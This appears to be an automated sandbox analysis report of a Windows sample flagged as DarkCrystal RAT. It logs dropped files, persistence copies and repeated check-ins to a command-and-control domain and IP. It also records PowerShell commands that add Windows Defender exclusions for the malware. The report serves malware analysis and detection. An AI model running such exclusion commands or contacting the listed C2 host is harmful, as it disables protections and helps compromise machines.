                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, Directory created: C:\Program Files\Windows Multimedia Platform\5940a34987c991
                            Source: PlZA6b48MW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.pdb source: PlZA6b48MW.exe, 00000000.00000002.1749070482.000000000309B000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: em.pdb source: WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.2404697406.000000001B342000.00000004.00000020.00020000.00000000.sdmp

                            Spreading

                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File opened: C:\Users\user
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File opened: C:\Users\user\AppData
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File opened: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, File opened: C:\Users\user\AppData\Local

                            Networking

                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49740 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49753 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49735 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49805 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49856 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49769 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49841 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49998 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50016 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50020 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50019 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50018 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50017 -> 37.44.238.250:80
                            Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49826 -> 37.44.238.250:80
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox View IP Address: 37.44.238.250 37.44.238.250
                            Source: Joe Sandbox View ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 505905cm.n9shka.top Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global traffic DNS traffic detected: DNS query: 505905cm.n9shka.top
                            Source: unknown HTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 505905cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 Jan 2025 18:22:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: PlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002D.00000002.1856049726.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003743000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://505905cm.n9shka.top
                            Source: PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://505905cm.n9shka.top/
                            Source: PlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://505905cm.n9shka.top/imagePollLinuxCentral.php
                            Source: powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000016.00000002.1875963931.00000207DAA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D04C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: PlZA6b48MW.exe, 00000000.00000002.1749070482.000000000309B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1875963931.00000207DA861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80001000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000016.00000002.1875963931.00000207DAA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D04C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000016.00000002.1875963931.00000207DA861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 0000001B.00000002.3256027350.000001A190077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Windows\DiagTrack\Scenarios\5915f7c410c8ebJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMPJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9B880D4C0_2_00007FFD9B880D4C
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9B880E430_2_00007FFD9B880E43
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9BC7B6C80_2_00007FFD9BC7B6C8
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 45_2_00007FFD9B890D4C45_2_00007FFD9B890D4C
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 45_2_00007FFD9B890E4345_2_00007FFD9B890E43
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B8BA24847_2_00007FFD9B8BA248
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B8BDE2547_2_00007FFD9B8BDE25
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B880D4C47_2_00007FFD9B880D4C
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B880E4347_2_00007FFD9B880E43
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeCode function: 56_2_00007FFD9B8A0D4C56_2_00007FFD9B8A0D4C
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeCode function: 56_2_00007FFD9B8A0E4356_2_00007FFD9B8A0E43
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeCode function: 56_2_00007FFD9BC9C54356_2_00007FFD9BC9C543
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B8BA24859_2_00007FFD9B8BA248
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B8BDE2559_2_00007FFD9B8BDE25
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B880D4C59_2_00007FFD9B880D4C
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B880E4359_2_00007FFD9B880E43
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CwRRQJIe.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                            Source: PlZA6b48MW.exe, 00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000000.00000002.1818541389.000000001B6B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000026.00000002.2728643910.0000000002F63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000026.00000002.2728643910.0000000002FAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000026.00000002.2728643910.0000000003019000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000026.00000002.2728643910.0000000002F53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe, 00000027.00000002.2694248504.0000000002F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exe.0.drBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs PlZA6b48MW.exe
                            Source: PlZA6b48MW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: PlZA6b48MW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: dllhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: WtHZilDMhVnOIkoIfPBLn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: PlZA6b48MW.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: WtHZilDMhVnOIkoIfPBLn.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: PlZA6b48MW.exe, CLZOU1nWue0Qdk97iqU.cs Cryptographic APIs: 'CreateDecryptor' (entry listed 4 times)
                            Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@69/82@1/1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Program Files\Windows Multimedia Platform\dllhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\IXnYeTUQ.logJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8876:120:WilError_03
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8420:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8600:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-e0MEoQzZAqT5aSFnG7OI
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\AppData\Local\Temp\py4wf331Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat"
                            Source: PlZA6b48MW.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (entry listed 18 times)
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: PlZA6b48MW.exeReversingLabs: Detection: 73%
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile read: C:\Users\user\Desktop\PlZA6b48MW.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC13.tmp" "c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'
